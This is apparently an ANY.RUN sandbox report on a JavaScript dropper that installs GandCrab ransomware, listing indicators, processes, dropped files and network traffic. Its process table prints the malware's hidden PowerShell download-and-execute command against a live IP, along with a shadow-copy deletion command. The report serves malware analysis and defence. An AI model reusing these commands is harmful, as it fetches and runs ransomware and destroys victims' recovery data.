analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Love_You_2019_1443303120-txt.js

Full analysis: https://app.any.run/tasks/f5f5fd72-0bb5-4862-955b-784a16508748
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: January 17, 2019, 14:35:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
ransomware
gandcrab
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, CR line terminators
MD5:

E75F0BC15048A15A5AA0D1F041515A02

SHA1:

B5DE64B722B6F42914E53A4DF57814FCD43EE196

SHA256:

BCB8A60C1F90813BECDAF0FE73292CF5EB7451415EAC2864DB5799818ACF6AE5

SSDEEP:

192:hs3ch+91j67D7OmOiI7WPoDOirD1v07mU/g2XOjarpT47llfr:hsMhL7soEhU/Qar+jfr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • TempUtN19.exe (PID: 2308)
      • winsvcs.exe (PID: 3532)
      • 1902841722.exe (PID: 2192)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2408)
    • Disables Windows System Restore

      • winsvcs.exe (PID: 3532)
    • Changes the autorun value in the registry

      • TempUtN19.exe (PID: 2308)
    • Changes Security Center notification settings

      • winsvcs.exe (PID: 3532)
    • Disables Windows Defender Real-time monitoring

      • winsvcs.exe (PID: 3532)
    • Downloads executable files from IP

      • powershell.exe (PID: 3096)
      • winsvcs.exe (PID: 3532)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3096)
      • winsvcs.exe (PID: 3532)
    • GandCrab keys found

      • 1902841722.exe (PID: 2192)
    • Writes file to Word startup folder

      • 1902841722.exe (PID: 2192)
    • Actions looks like stealing of personal data

      • 1902841722.exe (PID: 2192)
    • Renames files like Ransomware

      • 1902841722.exe (PID: 2192)
    • Deletes shadow copies

      • 1902841722.exe (PID: 2192)
    • Changes settings of System certificates

      • 1902841722.exe (PID: 2192)
    • Dropped file may contain instructions of ransomware

      • 1902841722.exe (PID: 2192)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3388)
    • Executable content was dropped or overwritten

      • TempUtN19.exe (PID: 2308)
      • powershell.exe (PID: 3096)
      • winsvcs.exe (PID: 3532)
    • Starts itself from another location

      • TempUtN19.exe (PID: 2308)
    • Creates files in the user directory

      • powershell.exe (PID: 3096)
      • 1902841722.exe (PID: 2192)
    • Creates files in the program directory

      • 1902841722.exe (PID: 2192)
    • Reads the cookies of Mozilla Firefox

      • 1902841722.exe (PID: 2192)
    • Creates files like Ransomware instruction

      • 1902841722.exe (PID: 2192)
    • Adds / modifies Windows certificates

      • 1902841722.exe (PID: 2192)
    • Reads Internet Cache Settings

      • 1902841722.exe (PID: 2192)
  • INFO

    • Dropped object may contain TOR URL's

      • 1902841722.exe (PID: 2192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start wscript.exe no specs cmd.exe no specs powershell.exe temputn19.exe winsvcs.exe #GANDCRAB 1902841722.exe wmic.exe vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3388"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_1443303120-txt.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2408"C:\Windows\System32\cmd.exe" /c JhCIFWVdRtYpjHOyekbEfrAMvgxaGB & powershell.exe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Windows'; $var.downloadfile('http://92.63.197.153/mcdonalds.exe','%temp%UtN19.exe'); & start %temp%UtN19.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3096powershell.exe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Windows'; $var.downloadfile('http://92.63.197.153/mcdonalds.exe','C:\Users\admin\AppData\Local\TempUtN19.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2308C:\Users\admin\AppData\Local\TempUtN19.exe C:\Users\admin\AppData\Local\TempUtN19.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3532C:\Users\admin\66087085470750\winsvcs.exeC:\Users\admin\66087085470750\winsvcs.exe
TempUtN19.exe
User:
admin
Integrity Level:
MEDIUM
2192C:\Users\admin\AppData\Local\Temp\1902841722.exeC:\Users\admin\AppData\Local\Temp\1902841722.exe
winsvcs.exe
User:
admin
Integrity Level:
MEDIUM
2568"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exe
1902841722.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3616C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
544
Read events
404
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
434
Text files
320
Unknown types
6

Dropped files

PID
Process
Filename
Type
3096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T7OR9FRI40LTL7YUOKPA.temp
MD5:
SHA256:
21921902841722.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
21921902841722.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.xhmdx
MD5:
SHA256:
3532winsvcs.exeC:\Users\admin\AppData\Local\Temp\1902841722.exeexecutable
MD5:E387BD817E9B7F02FA9C2511CC345F12
SHA256:39514226B71AEBBE775AA14627C716973282CBA201532DF3F820A209D87F6DF9
3096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF198a73.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3532winsvcs.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[1].exeexecutable
MD5:E387BD817E9B7F02FA9C2511CC345F12
SHA256:39514226B71AEBBE775AA14627C716973282CBA201532DF3F820A209D87F6DF9
3096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
21921902841722.exeC:\Program Files\XHMDX-DECRYPT.txttext
MD5:A08A44F2B43EBBCA64E42A68E2FB0C17
SHA256:8E1C3BA870C383AA84019CCE7967ED9ABC247D91A12E3088BC27424C78943C4B
21921902841722.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\XHMDX-DECRYPT.txttext
MD5:A08A44F2B43EBBCA64E42A68E2FB0C17
SHA256:8E1C3BA870C383AA84019CCE7967ED9ABC247D91A12E3088BC27424C78943C4B
21921902841722.exeC:\MSOCache\XHMDX-DECRYPT.txttext
MD5:A08A44F2B43EBBCA64E42A68E2FB0C17
SHA256:8E1C3BA870C383AA84019CCE7967ED9ABC247D91A12E3088BC27424C78943C4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
6
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3532
winsvcs.exe
GET
92.63.197.153:80
http://92.63.197.153/s/1.exe
RU
malicious
3096
powershell.exe
GET
200
92.63.197.153:80
http://92.63.197.153/mcdonalds.exe
RU
executable
278 Kb
malicious
3532
winsvcs.exe
GET
92.63.197.153:80
http://92.63.197.153/s/1.exe
RU
malicious
3532
winsvcs.exe
GET
200
92.63.197.153:80
http://92.63.197.153/s/1.exe
RU
executable
361 Kb
malicious
3532
winsvcs.exe
GET
404
92.63.197.153:80
http://92.63.197.153/s/3.exe
RU
html
178 b
malicious
3532
winsvcs.exe
GET
404
92.63.197.153:80
http://92.63.197.153/s/5.exe
RU
html
178 b
malicious
3532
winsvcs.exe
GET
404
92.63.197.153:80
http://92.63.197.153/s/2.exe
RU
html
178 b
malicious
2192
1902841722.exe
GET
301
138.201.162.99:80
http://www.kakaocorp.link/
DE
html
162 b
malicious
3532
winsvcs.exe
GET
404
92.63.197.153:80
http://92.63.197.153/s/3.exe
RU
html
178 b
malicious
3532
winsvcs.exe
GET
404
92.63.197.153:80
http://92.63.197.153/s/5.exe
RU
html
178 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3096
powershell.exe
92.63.197.153:80
RU
malicious
2192
1902841722.exe
138.201.162.99:80
www.kakaocorp.link
Hetzner Online GmbH
DE
malicious
3532
winsvcs.exe
92.63.197.153:80
RU
malicious
2192
1902841722.exe
138.201.162.99:443
www.kakaocorp.link
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
www.kakaocorp.link
  • 138.201.162.99
malicious

Threats

PID
Process
Class
Message
3096
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3096
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3096
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3096
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
3532
winsvcs.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3532
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
3532
winsvcs.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3532
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
3532
winsvcs.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3532
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
No debug info